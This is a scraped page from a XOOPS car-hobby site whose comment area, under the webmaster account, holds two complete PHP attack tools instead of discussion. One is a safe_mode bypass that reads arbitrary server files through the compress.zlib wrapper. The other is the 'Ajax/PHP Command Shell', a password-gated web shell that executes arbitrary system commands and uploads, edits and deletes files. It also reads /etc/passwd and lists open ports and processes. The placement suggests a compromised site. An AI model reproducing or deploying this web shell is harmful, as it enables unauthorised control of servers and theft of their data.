Register now on mysite.com!    Login  
HOME CONTACT ARTICLES
Main Menu
Recent Comments
xoops Articles admin_minizturbo 2009/12/2 2:45
xoops Articles admin_minizturbo 2009/12/2 2:43
Feature Items
Login
Username:

Password:


Lost Password?

Register now!
External Turbo
  Posted on Fri 30 Jul 2004 (5126 reads)
Index :: Print :: E-mail
The comments are owned by the poster. We aren't responsible for their content.

Poster Thread
admin_minizturbo
Posted: 2009/12/2 2:43  Updated: 2009/12/2 2:51
Webmaster
Joined: 2004/7/29
From:
Posts: 2
 xoops




!Safe
Mode Shell v1.0!











/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by PHP Emperor<xb5@hotmail.com>
*/

echo "Safe Mode Shell";




$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "ON (secure)";
}
else {$safemode = false; $hsafemode = "OFF (not secure)";}
echo("Safe-mode: $hsafemode");
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
echo("
");
echo("Open base dir: $hopenbasedir");
echo("
");
echo "Disable functions : ";
if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);

echo "
\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n 
COLOR=\"RED\">PHP Emperor
xb5@hotmail.com
");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "--- Start File ".htmlspecialchars($file)."
-------------\n".htmlspecialchars($tekst)."\n--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\nFile
".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
;]");
} else {
die("
Sorry... File
".htmlspecialchars($file)." dosen't exists or you don't have
access.
");
}
?>

Poster Thread
admin_minizturbo
Posted: 2009/12/2 2:45  Updated: 2009/12/2 2:45
Webmaster
Joined: 2004/7/29
From:
Posts: 2
 xoops
session_start();

error_reporting(0);

$password = "password"; //Change this to your password ;)

$version = "0.7B";

$functions = array('Clear Screen' => 'ClearScreen()',
'Clear History' => 'ClearHistory()',
'Can I function?' => "runcommand('canirun','GET')",
'Get server info' => "runcommand('showinfo','GET')",
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
'Running processes' => "runcommand('ps -aux','GET')",
'Readme' => "runcommand('shellhelp','GET')"

);
$thisfile = basename(__FILE__);

$style = '';
$sess = __FILE__.$password;
if(isset($_POST['p4ssw0rD']))
{
if($_POST['p4ssw0rD'] == $password)
{
$_SESSION[$sess] = $_POST['p4ssw0rD'];
}
else
{
die("Wrong password");
}

}
if($_SESSION[$sess] == $password)
{
if(isset($_SESSION['workdir']))
{
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
{
chdir($_SESSION['workdir']);
}
}

if(isset($_FILES['uploadedfile']['name']))
{
$target_path = "./";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

}
}

if(isset($_GET['runcmd']))
{

$cmd = $_GET['runcmd'];

print "".get_current_user()."~# ". htmlspecialchars($cmd)."
";

if($cmd == "")
{
print "Empty Command..type \"shellhelp\" for some ehh...help";
}

elseif($cmd == "upload")
{
print '
Uploading to: '.realpath(".");
if(is_writable(realpath(".")))
{
print "
I can write to this directory";
}
else
{
print "
I can't write to this directory, please choose another one.";
}

}
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
{
if(file_exists($file[1]) && is_dir($file[1]))
{
chdir($file[1]);
$_SESSION['workdir'] = $file[1];
print "Current directory changed to ".$file[1];
}
else
{
print "Directory not found";
}
}

elseif(strtolower($cmd) == "shellhelp")
{
print 'Ajax/PHP Command Shell
© By Ironfist

The shell can be used by anyone to command any server, the main purpose was
to create a shell that feels as dynamic as possible, is expandable and easy
to understand.

If one of the command execution functions work, the shell will function fine.
Try the "canirun" command to check this.

Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
not used to these commands, google a little.

Custom Functions
If you want to add your own custom command in the Quick Commands list, check
out the code. The $function array contains \'func name\' => \'javascript function\'.
Take a look at the built-in functions for examples.

I know this readme isn\'t providing too much information, but hell, does this shell
even require one :P

- Iron
';

}
elseif(ereg("editfile (.*)",$cmd,$file))
{
if(file_exists($file[1]) && !is_dir($file[1]))
{
print "

";
}
else
{
print "File not found.";
}
}
elseif(ereg("deletefile (.*)",$cmd,$file))
{
if(is_dir($file[1]))
{
if(rmdir($file[1]))
{
print "Directory succesfully deleted.";
}
else
{
print "Couldn't delete directory!";
}
}
else
{
if(unlink($file[1]))
{
print "File succesfully deleted.";
}
else
{
print "Couldn't delete file!";
}
}
}
elseif(strtolower($cmd) == "canirun")
{
print "If any of these functions is Enabled, the shell will function like it should.
";
if(function_exists(passthru))
{
print "Passthru: Enabled
";
}
else
{
print "Passthru: Disabled
";
}

if(function_exists(exec))
{
print "Exec: Enabled
";
}
else
{
print "Exec: Disabled
";
}

if(function_exists(system))
{
print "System: Enabled
";
}
else
{
print "System: Disabled
";
}
if(function_exists(shell_exec))
{
print "Shell_exec: Enabled
";
}
else
{
print "Shell_exec: Disabled
";
}
print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a
reason why the commands aren't executed, this is probally it.
";
if( ini_get('safe_mode') ){
print "Safe Mode: Enabled";
}
else
{
print "Safe Mode: Disabled";
}
print "

Open_basedir will block access to some files you shouldn't access.
";
if( ini_get('open_basedir') ){
print "Open_basedir: Enabled";
}
else
{
print "Open_basedir: Disabled";
}
}
//About the shell
elseif(ereg("listdir (.*)",$cmd,$directory))
{

if(!file_exists($directory[1]))
{
die("Directory not found");
}
//Some variables
chdir($directory[1]);
$i = 0; $f = 0;
$dirs = "";
$filez = "";

if(!ereg("/$",$directory[1])) //Does it end with a slash?
{
$directory[1] .= "/"; //If not, add one
}
print "Listing directory: ".$directory[1]."
";
print "";

if ($handle = opendir($directory[1])) {
while (false !== ($file = readdir($handle))) {
if(is_dir($file))
{
$dirs[$i] = $file;
$i++;
}
else
{
$filez[$f] = $file;
$f++;
}

}
print "
DirectoriesFiles
";

foreach($dirs as $directory)
{
print "[D][W]".$directory."
";
}

print "		";

foreach($filez as $file)
{
print "[D]".$file."
";
}

print "
";
}
}
elseif(strtolower($cmd) == "about")
{
print "Ajax Command Shell by Ironfist.
Version $version";
}
//Show info
elseif(strtolower($cmd) == "showinfo")
{
if(function_exists(disk_free_space))
{
$free = disk_free_space("/") / 1000000;
}
else
{
$free = "N/A";
}
if(function_exists(disk_total_space))
{
$total = trim(disk_total_space("/") / 1000000);
}
else
{
$total = "N/A";
}
$path = realpath (".");

print "Free: $free / $total MB
Current path: $path
Uname -a Output:
";

if(function_exists(passthru))
{
passthru("uname -a");
}
else
{
print "Passthru is disabled :(";
}
}
//Read /etc/passwd
elseif(strtolower($cmd) == "etcpasswdfile")
{

$pw = file('/etc/passwd/');
foreach($pw as $line)
{
print $line;
}


}
//Execute any other command
else
{

if(function_exists(passthru))
{
passthru($cmd);
}
else
{
if(function_exists(exec))
{
exec("ls -la",$result);
foreach($result as $output)
{
print $output."
";
}
}
else
{
if(function_exists(system))
{
system($cmd);
}
else
{
if(function_exists(shell_exec))
{
print shell_exec($cmd);
}
else
{
print "Sorry, none of the command functions works.";
}
}
}
}
}
}

elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
{
$file = $_POST['filetosave'];
if(!is_writable($file))
{
if(!chmod($file, 0777))
{
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
}
}

$fh = fopen($file, 'w');
$dt = $_POST['filecontent'];
fwrite($fh, $dt);
fclose($fh);
}
else
{
?>

Command Shell ~ <?php print getenv("HTTP_HOST"); ?>












Quick Commands



foreach($functions as $name => $execute)
{
print ' 
';
}
?>





Command history




About




Ajax/PHP Command Shell
by Ironfist


Version







Thanks to everyone @
SharePlaza


milw0rm


and special greetings to everyone in rootshell








[Execute command]
[Upload file]
[Change directory]
[Filebrowser]
[Create File]





   

Command:







}
} else {
print "


You are not logged in, please login.
Password:
";
}
?>



Partners

http://cybercopter.amdhobby.com

Sponsor

License Information | Privacy Policy | Faq | Contact


Copyright ?2004 - 5 by miniZturbo.com  |  000000000000000000